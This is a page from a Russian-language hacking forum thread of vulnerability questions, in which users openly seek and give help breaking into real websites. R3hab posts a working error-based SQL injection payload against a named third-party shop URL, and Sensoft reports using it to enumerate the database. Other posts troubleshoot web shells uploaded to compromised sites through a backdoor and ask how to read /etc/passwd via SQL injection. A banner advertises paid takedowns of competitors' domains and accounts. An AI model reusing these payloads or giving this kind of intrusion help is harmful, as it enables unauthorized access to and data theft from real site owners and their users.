Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 131 из 296

131

Опции темы

Поиск в этой теме

Опции просмотра

31.08.2016, 06:05

Nikolaz

Новичок

Регистрация: 17.11.2011

Сообщений: 0

С нами: 7624406

Репутация: -5

Есть возможность залить шелл через бекдор, но при заливке через wget,curl или copy - автоматом на любой файл выставляются засратые права не позволяющие его запустить. chmod не помогает права меняются, но на выполнение всё равно нет. В других форматах (не php) пробовал притягивать - та же история. Можно что то придумать чтобы как то получить нормальные права и запустить шелл?

𝕏 Twitter Reddit Telegram Копировать ссылку

31.08.2016, 12:26

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

keran.am/catalog/296-fonariki/1'%22-fonar_909_9led_3aaa.html помогите раскрутить

31.08.2016, 13:01

R3hab

Участник форума

Регистрация: 17.05.2015

Сообщений: 117

С нами: 5785526

Репутация: 6

Цитата:

Сообщение от Sensoft

↑
keran.am/catalog/296-fonariki/1'%22-fonar_909_9led_3aaa.html помогите раскрутить

Код HTML:

http://keran.am/catalog/296-fonariki/119-fonar.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1

31.08.2016, 13:15

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

Цитата:

Сообщение от R3hab

↑

Код HTML:

http://keran.am/catalog/296-fonariki/119-fonar.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1

Спасибо, подправил за место версии поставил INFORMATION_SCHEMA узнал bd

31.08.2016, 13:35

R3hab

Участник форума

Регистрация: 17.05.2015

Сообщений: 117

С нами: 5785526

Репутация: 6

залил шелл на сайт,но не хочет открываться,выдает ошибку

Цитата:

Сообщение от None

500 Internal Server Error

можно ее как то обойти?

31.08.2016, 13:45

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами: 5745206

Репутация: 1

Цитата:

Сообщение от R3hab

↑
залил шелл на сайт,но не хочет открываться,выдает ошибку
можно ее как то обойти?

Попробуй залить другой, мог антивирус сервака удалить. Или там права на файлы поставлены тогда да, надо как то обходить

31.08.2016, 13:57

pw0ned

Участник форума

Регистрация: 08.01.2016

Сообщений: 118

С нами: 5445686

Репутация: 14

Цитата:

Сообщение от R3hab

↑
залил шелл на сайт,но не хочет открываться,выдает ошибку
можно ее как то обойти?

Значит не залил. Возможно обращаешься по неправильному пути.

31.08.2016, 13:59

R3hab

Участник форума

Регистрация: 17.05.2015

Сообщений: 117

С нами: 5785526

Репутация: 6

Цитата:

Сообщение от pw0ned

↑
Значит не залил. Возможно обращаешься по неправильному пути.

если бы не залилось,то выдавало бы другую ошибку

Цитата:

Сообщение от None

404 Not Found

31.08.2016, 14:09

pw0ned

Участник форума

Регистрация: 08.01.2016

Сообщений: 118

С нами: 5445686

Репутация: 14

Цитата:

Сообщение от R3hab

↑
если бы не залилось,то выдавало бы другую ошибку

точно.

ну тогда видимо chmod, выставлены права на папку к которой обращаешься.

#10

01.09.2016, 03:37

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

С нами: 9979143

Репутация: -5

Имеется sql-inj через нее можно смотреть файлы

....mid((cast(concat(load_file(/etc/passwd),.....

Возможно ли вывод load_file сделать в base64?

Страница 131 из 296

131

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules